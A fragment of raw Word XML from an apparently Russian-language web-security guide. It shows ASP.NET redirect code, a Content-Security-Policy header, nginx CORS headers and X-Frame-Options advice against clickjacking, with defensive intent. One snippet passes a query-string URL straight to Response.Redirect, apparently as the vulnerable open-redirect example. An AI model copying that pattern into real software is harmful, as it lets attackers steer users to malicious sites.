          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Response</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typ"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Redirect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="typ"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Request</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typ"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>QueryString</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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str"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:szCs w:val="24"/>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73185F51" w:rsidR="002C09BA" w:rsidRPr="00295BB1" w:rsidRDefault="00591A13" w:rsidP="004A1170">
      <w:pPr>
        <w:pStyle w:val="22"/>
        <w:ind w:left="0" w:firstLine="708"/>
        <w:rPr>
          <w:rStyle w:val="com"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId67" w:history="1">
        <w:r w:rsidR="004A1170" w:rsidRPr="00295BB1">
          <w:rPr>
            <w:rStyle w:val="a8"/>
            <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:szCs w:val="24"/>
            <w:u w:val="none"/>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val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>private</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>ActionResult</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>RedirectToLocalPage</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roofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000088"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>string</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>redirectUrl</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
    <w:p w14:paraId="66811006"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val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0050A168"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val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pP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000088"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>if</w:t>
      </w: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666600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Url</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660066"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>IsLocalUrl</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roofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>redirectUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>))</w:t>
      </w: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000088"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>return</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>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660066"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>Redirect</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>redirectUrl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304CC37C" w14:textId="77777777" w:rsidR="002C09BA" w:rsidRPr="00295BB1" w:rsidRDefault="002C09BA" w:rsidP="002C09BA">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:firstLine="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US" w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="880000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
        <w:t>// ...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C3D21F" w14:textId="7B889790" w:rsidR="002C09BA" w:rsidRPr="00295BB1" w:rsidRDefault="002C09BA" w:rsidP="002C09BA">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:eastAsia="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>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sidRPr="00527702">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>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Pr="00295BB1" w:rsidRDefault="00E67720" w:rsidP="00EF3376">
      <w:pPr>
        <w:pStyle w:val="22"/>
        <w:ind w:left="0" w:firstLine="708"/>
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>content</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pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>security</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pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>policy</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> script</w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pun"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="666600"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="str"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="008800"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'self'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E8521C" w14:textId="2E86BC73" w:rsidR="00E67720" w:rsidRDefault="00E67720" w:rsidP="00E67720">
      <w:r>
        <w:lastRenderedPageBreak/>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295BB1" w:rsidRDefault="00E67720" w:rsidP="00E67720">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'Access-Control-Allow-Origin' 'mywebsite.org';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5954A129" w14:textId="018AB76F" w:rsidR="00E67720" w:rsidRPr="00295BB1" w:rsidRDefault="00E67720" w:rsidP="00E67720">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>add_header</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00295BB1">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> 'Access-Control-Allow-Methods' '';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A91F33" w14:textId="478AAFA6" w:rsidR="00434B16" w:rsidRDefault="00434B16" w:rsidP="00434B16">
      <w:r>
        <w:t xml:space="preserve">Для защиты от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>clickjacking</w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">атак можно установить заголовок </w:t>
      </w:r>
      <w:r w:rsidRPr="00527702">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>X-FRAME-OPTIONS</w:t>
      </w:r>
      <w:r w:rsidRPr="00434B16">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">со значением </w:t>
      </w:r>
      <w:r w:rsidRPr="00527702">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>DENY</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Это запретит помещать страницы веб-сайта в </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00527702">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>iframe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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527702">
        <w:rPr>
          <w:rStyle w:val="pln"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F5F5F5"/>
        </w:rPr>
        <w:t>X-</w:t>
      </w:r>
      <w:r w:rsidRPr="00527702">
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Content-Type-</w:t>
      </w:r>
